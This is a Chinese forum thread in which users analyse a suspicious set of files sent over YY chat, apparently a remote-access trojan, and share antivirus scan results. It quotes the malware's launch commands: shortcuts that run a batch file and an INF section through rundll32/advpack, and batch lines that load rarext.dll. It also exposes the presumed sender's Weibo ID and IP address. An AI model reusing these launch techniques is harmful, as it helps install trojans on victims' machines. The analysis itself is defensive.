YY上某人发来的可疑文件 简单分析了下

王

看到这么多文件还真是无语啊，就不能用易语言封装成exe么，这么多文件你到底想让我打开哪个呢？……

于是我就慢慢的看咯，我这边看着，他那边还催着，教我怎么打开，还真是比较心急呢……



自己简单的分析了下，各位帮忙看看对不对，以及分析下这到底是个什么玩意儿。

两个快捷方式如下：
图片1 C:\WINDOWS\system32\cmd.exe /c png.bat
图片2 C:\WINDOWS\system32\rundll32.exe advpack.dll,LaunchINFSectionEx %appdata%\winrar\winrar.inf,DefaultInstall,,32

这个是运行批处理并注册rarext.dll？


png.bat内容做了加密，网上找了个解密的bat解了之后内容如下：

cls
mkdir "%systemroot%"
rundll32.exe rarext.dll,winrar -fn ewgfhrt

这个是清屏然后创建%systemroot%之后再运行那个dll？


好吧，剩下的我就不会了，压缩后丢到火眼。结果如下：
http://fireeye.ijinshan.com/anal ... 4a0&type=1#full

然后又发现点有趣的东西：

行为描述：创建互斥体
附加信息：

"_!SHMSFTHISTORY!_"

"c:!documents and settings!administrator!local settings!history!history.ie5!mshist012013012320130124!"

"t.qq.com/aaa45452511"


这不是腾讯微博地址吗？后面的aaa45452511就是用户ID了。于是乎QQ号就这么出来了……
再看其微博签名目前是“=>IP=113.73.105.156=”
目测应该是其IP地址，估计也是adsl上网的吧？为了让肉鸡主动联系自己？

好吧，我只会分析到这里，剩下的就不知道怎么办了……


我将他的IP的地址告诉他之后，他就把YY好友给删掉了，于是聊天记录就没了，总的来说和网上看到的类似。
都是先给你发个正在接收图片的图片，然后你会纳闷为什么接收不了，然后就直接给你发文件，哦不，这个直接发文件夹。。。


两个样本都发上来吧，各位看看dll具体是什么。

Miostartos

这种远控还没绝迹啊，EES杀了图片，图片2没杀

蓝天二号

歌德塔 扫描miss......貌似是远控，，

星猫

mcafee miss

欧阳宣

to mcafee

星猫

欧阳宣 发表于 2014-10-25 18:34
to mcafee

mcafee发extra.dat是说明病毒分析师已确认这是病毒，还是只要上报样本就会发extra.dat

星猫

McAfee Labs - Beaverton                                                               
Current Scan Engine Version:5600.1067                                                  
Current DAT Version:7601.0000                                                         
Thank you for your submission.                                                         

Analysis ID: 9179733

File Name            Findings                       Detection                    Type         Extra
--------------------|------------------------------|----------------------------|------------|-----
bbs.bmp             |inconclusive                  |                            |            |no   
glmad               |inconclusive                  |                            |            |no   
png.bat             |inconclusive                  |                            |            |no   
rarext.dll          |inconclusive                  |                            |            |no   
xxxx1.lnk           |inconclusive                  |                            |            |no   
xxxx2.lnk           |inconclusive                  |                            |            |no   

inconclusive [bbs.bmp glmad png.bat rarext.dll xxxx1.lnk xxxx2.lnk]                                

   Automated analysis was not able to determine that this file is malware. This file is   
being sent for further processing and the DAT files will potentially be updated if     
detection of this sample is warranted.                                                

Note                                                                                 

Due to the prevalence of network gateway AV products, it is important that all         
submissions be zipped and the zip file password-protected (password - infected). Some  
products will reject an email that contains a virus that is not sent in this way. In   
addition, often we receive a file that appears not to have been infected, to find      
later that the file was infected when it left the sender, and was cleaned somewhere   
along the line.                                                                        

Regards,                                                                              



McAfee Labs                                                                     

Miostartos

星猫 发表于 2014-10-25 18:37
mcafee发extra.dat是说明病毒分析师已确认这是病毒，还是只要上报样本就会发extra.dat

确认病毒才发

雪白方糖

            这么多文件，我该点哪个呢？

MrDeep